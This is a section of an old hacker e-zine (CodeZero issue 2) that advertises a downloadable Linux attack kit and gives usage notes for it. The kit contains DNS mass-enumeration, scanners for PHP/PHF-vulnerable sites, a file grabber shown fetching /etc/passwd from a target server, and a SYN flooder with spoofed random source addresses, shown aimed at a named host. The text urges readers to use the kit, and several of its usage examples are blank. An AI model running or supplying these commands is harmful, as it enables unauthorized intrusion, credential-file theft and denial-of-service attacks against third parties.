ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
w00 w00!! Now you can have k-leet skills like me! Firstly upload the crak.tar
to a linux 2.0.x system, or to your own, then tar -xvf crack.tar to unzip the
file, then move the files around and shit if you want to, then you're ready
to go! Expect OS specific kits in later issues...And Multi-Scan s00n.
===============================================================================
The Contents Of The Kit :
===============================================================================
dnsscan : Mass DNS query program, gets lists of systems in entire countries,
or all the systems on a network, like *.microsoft.com.
phpscan : Scans hosts from a file and outputs a list of php vunerable sites.
phpget : Gets files from php vunerable servers.
phfscan : Scans hosts from a file and outputs a list of php vunerable sites.
ident-scan: Scans all daemons running on ports and determines cool stuff.
===============================================================================
Usages :
===============================================================================
DNSscan :
---------
The -domain mode will first create a file called 'domain.<domain>' with a
list of all subdomains and their name servers, and then use that file in
the -file mode.
PHPscan :
---------
eg.
PHPget :
--------
eg.
phpget www.p1.com /etc/passwd
PHFscan :
---------
eg.
Ident-Scan :
------------
eg.
TCPprobe :
----------
tcpprobe <host>
eg.
tcpprobe microsoft.com
Fingah :
--------
eg.
Synk4 :
-------
if you use 0 as the source address, its puts the syn flooder into random
ip mode, where the packets are sent from many different random sites.
eg.
synk4 0 fucked.com 1 23
Have Phun!@#
===============================================================================
Where To Get CRAK.tar : Under CodeZero Linux Tools Section on www.codez.com
===============================================================================
It can be unzipped with WinZip if you are in W1nd0ze too.. :)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Well, that was issue 2, hope ya'll liked it, don't forget to visit...
AnD ReMeMBer To LiNk To iT FrOm YouR SiTeZ!!
Until next time, when there will be 900 days until the year 2000...
The CodeZero.
===============================================================================
=====================> http://www.codez.com NOW UP!@#* <=====================
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Remember, McDonalds Owns You, And Ronald Is The KinG!!!
Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ